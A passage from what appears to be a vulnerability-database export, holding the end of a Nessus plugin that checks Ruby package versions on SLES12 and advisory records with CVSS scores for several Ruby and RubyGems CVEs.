script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libruby2_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libruby2_1-2_1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:yast2-ruby-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:yast2-ruby-bindings-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:yast2-ruby-bindings-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libruby2_1-2_1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-debugsource-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-stdlib-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libruby2_1-2_1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-debugsource-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-stdlib-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libruby2_1-2_1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", 
reference:\"ruby2.1-debugsource-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-stdlib-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"yast2-ruby-bindings-3.1.53-9.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"yast2-ruby-bindings-debuginfo-3.1.53-9.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"yast2-ruby-bindings-debugsource-3.1.53-9.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libruby2_1-2_1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-debugsource-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-stdlib-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-19.3.2\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "mageia": [{"lastseen": "2023-08-07T08:46:09", "description": "It was discovered that Ruby Net::SMTP incorrectly handled CRLF sequences. A remote attacker could possibly use this issue to inject SMTP commands. (CVE-2015-9096) Marcin Noga discovered that Ruby incorrectly handled certain arguments in a TclTkIp class method. 
An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-2337) It was discovered that Ruby Fiddle::Function.new incorrectly handled certain arguments. An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-2339) \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-20T09:10:44", "type": "mageia", "title": "Updated ruby packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9096", "CVE-2016-2337", "CVE-2016-2339"], "modified": "2017-08-20T09:10:44", "id": "MGASA-2017-0290", "href": "https://advisories.mageia.org/MGASA-2017-0290.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-21T21:13:51", "description": "Updated ruby-RubyGems package fixes security vulnerability: RubyGems does not validate the hostname when fetching gems or making API request, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack\" 
(CVE-2015-3900). \n", "cvss3": {}, "published": "2015-09-08T17:55:59", "type": "mageia", "title": "Updated ruby-RubyGems packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-09-08T17:55:59", "id": "MGASA-2015-0345", "href": "https://advisories.mageia.org/MGASA-2015-0345.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhatcve": [{"lastseen": "2021-09-02T22:54:13", "description": "An exploitable heap overflow vulnerability exists in the Fiddle::Function.new \"initialize\" function functionality of Ruby. In Fiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is made based on args array length. 
Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-12T14:50:43", "type": "redhatcve", "title": "CVE-2016-2339", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2020-04-08T22:05:25", "id": "RH:CVE-2016-2339", "href": "https://access.redhat.com/security/cve/cve-2016-2339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:51:46", "description": "Type confusion exists in _cancel_eval Ruby's TclTkIp class method. 
Attacker passing different type of object than String as \"retval\" argument can cause arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-12T14:50:37", "type": "redhatcve", "title": "CVE-2016-2337", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2020-04-08T22:04:23", "id": "RH:CVE-2016-2337", "href": "https://access.redhat.com/security/cve/cve-2016-2337", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-03T14:29:39", "description": "An exploitable heap overflow vulnerability exists in the Fiddle::Function.new \"initialize\" function functionality of Ruby. In Fiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is made based on args array length. 
Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "type": "cve", "title": "CVE-2016-2339", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2018-07-15T01:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.2.2"], "id": "CVE-2016-2339", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:29:41", "description": "Type confusion exists in _cancel_eval Ruby's TclTkIp class method. 
Attacker passing different type of object than String as \"retval\" argument can cause arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "type": "cve", "title": "CVE-2016-2337", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2018-08-28T10:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.2.2"], "id": "CVE-2016-2337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2337", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T17:13:22", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack.\"", "cvss3": {}, "published": "2015-06-24T14:59:00", "type": "cve", "title": "CVE-2015-3900", "cwe": 
["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2019-04-22T17:48:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.1.3", "cpe:/a:rubygems:rubygems:2.4.2", "cpe:/a:rubygems:rubygems:2.4.6", "cpe:/a:rubygems:rubygems:2.0.6", "cpe:/a:rubygems:rubygems:2.2.2", "cpe:/a:rubygems:rubygems:2.0.15", "cpe:/a:rubygems:rubygems:2.0.12", "cpe:/a:ruby-lang:ruby:1.9.1", "cpe:/a:rubygems:rubygems:2.0.13", "cpe:/a:rubygems:rubygems:2.0.0", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3", "cpe:/a:rubygems:rubygems:2.4.0", "cpe:/a:rubygems:rubygems:2.0.10", "cpe:/a:rubygems:rubygems:2.0.11", "cpe:/a:ruby-lang:ruby:2.1.5", "cpe:/a:rubygems:rubygems:2.0.14", "cpe:/a:rubygems:rubygems:2.2.1", "cpe:/a:ruby-lang:ruby:2.1", "cpe:/a:ruby-lang:ruby:2.2.0", "cpe:/a:rubygems:rubygems:2.2.3", "cpe:/a:rubygems:rubygems:2.4.1", "cpe:/a:rubygems:rubygems:2.0.2", "cpe:/a:rubygems:rubygems:2.0.7", "cpe:/a:ruby-lang:ruby:2.1.2", "cpe:/a:rubygems:rubygems:2.0.5", "cpe:/a:ruby-lang:ruby:2.1.1", "cpe:/a:rubygems:rubygems:2.0.4", "cpe:/a:rubygems:rubygems:2.0.8", "cpe:/a:ruby-lang:ruby:1.9.3", "cpe:/a:rubygems:rubygems:2.4.4", "cpe:/a:rubygems:rubygems:2.0.3", "cpe:/a:ruby-lang:ruby:2.1.4", "cpe:/a:ruby-lang:ruby:1.9", "cpe:/a:ruby-lang:ruby:2.0.0", "cpe:/a:rubygems:rubygems:2.0.1", "cpe:/a:ruby-lang:ruby:1.9.2", "cpe:/a:rubygems:rubygems:2.4.3", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:rubygems:rubygems:2.0.9", "cpe:/a:rubygems:rubygems:2.2.0", "cpe:/a:rubygems:rubygems:2.4.5"], "id": 
"CVE-2015-3900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3900", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:rubygems:rubygems:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1:-:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.5:*:*:*:*:*:*:*", 
"cpe:2.3:a:ruby-lang:ruby:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.6:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-16T21:10:38", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.4.x before 2.4.8 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record with a domain that is suffixed with the original domain name, aka a \"DNS hijack attack.\" NOTE: this vulnerability exists because to an incomplete fix for CVE-2015-3900.", "cvss3": {}, "published": "2015-08-25T17:59:00", "type": "cve", "title": "CVE-2015-4020", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2017-12-09T02:29:00", "cpe": ["cpe:/a:rubygems:rubygems:2.4.1", "cpe:/a:rubygems:rubygems:2.0.7", "cpe:/a:rubygems:rubygems:2.0.9", "cpe:/a:rubygems:rubygems:2.0.10", "cpe:/a:rubygems:rubygems:2.2.4", "cpe:/a:rubygems:rubygems:2.0.13", "cpe:/a:rubygems:rubygems:2.4.4", "cpe:/a:rubygems:rubygems:2.4.2", "cpe:/a:rubygems:rubygems:2.2.0", "cpe:/a:rubygems:rubygems:2.2.2", "cpe:/a:rubygems:rubygems:2.0.1", "cpe:/a:rubygems:rubygems:2.0.12", "cpe:/a:rubygems:rubygems:2.0.11", "cpe:/a:rubygems:rubygems:2.4.5", "cpe:/a:rubygems:rubygems:2.4.7", 
"cpe:/a:rubygems:rubygems:2.0.2", "cpe:/a:rubygems:rubygems:2.0.4", "cpe:/a:rubygems:rubygems:2.2.3", "cpe:/a:rubygems:rubygems:2.0.8", "cpe:/a:rubygems:rubygems:2.0.6", "cpe:/a:rubygems:rubygems:2.0.14", "cpe:/a:rubygems:rubygems:2.0.3", "cpe:/a:rubygems:rubygems:2.4.3", "cpe:/o:oracle:solaris:11.3", "cpe:/a:rubygems:rubygems:2.0.15", "cpe:/a:rubygems:rubygems:2.2.1", "cpe:/a:rubygems:rubygems:2.4.0", "cpe:/a:rubygems:rubygems:2.0.5", "cpe:/a:rubygems:rubygems:2.4.6", "cpe:/a:rubygems:rubygems:2.0.0", "cpe:/a:rubygems:rubygems:2.0.16"], "id": "CVE-2015-4020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4020", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:rubygems:rubygems:2.0.0:preview2.1:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:preview2.2:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.4:*:*:*:*:*:*:*", 
